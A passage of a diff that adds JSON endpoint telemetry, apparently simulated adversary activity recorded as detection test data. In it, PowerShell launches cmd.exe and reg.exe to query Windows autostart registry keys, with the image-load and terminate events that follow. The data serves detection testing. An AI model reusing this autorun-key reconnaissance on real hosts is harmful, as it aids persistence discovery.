"\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4248, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312980000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5316, + "ppid": 4248, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313060000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5316, + 
"process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312920000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "process", + "pid": 5316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" + }, + { + "event_type": "process", + "pid": 4248, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7264, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571313220000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": 
"C:\\Windows\\System32\\cmd.exe", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313090000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1448, + "ppid": 7264, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313340000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}", + "unique_ppid": 
"{42FC7E13-CB0B-5C05-0000-001072BB5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313240000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + 
{ + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "process", + "pid": 1448, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}" + }, + { + "event_type": "process", + "pid": 7264, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7860, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571313530000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", + "unique_ppid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313390000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4136, + "ppid": 7860, + "process_name": "reg.exe", + 
"process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313640000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 
4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "process", + "pid": 4136, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C1BE5001}" + }, + { + "event_type": "process", + "pid": 7860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CDBD5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3952, + "ppid": 7036, + "process_name": "cmd.exe", + 
"process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571313799984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571313710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "event_type": "process", + 
"logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 360, + "ppid": 3952, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571313880000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001021C05001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "process", + "pid": 360, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" + }, + { + "event_type": "process", + "pid": 3952, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571313860000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": 
"powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5500, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571314060000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5500, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571314020000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-00106BC25001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3824, + "ppid": 5500, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571314150016, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314020000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3824, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571314180000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" + }, + { + "event_type": 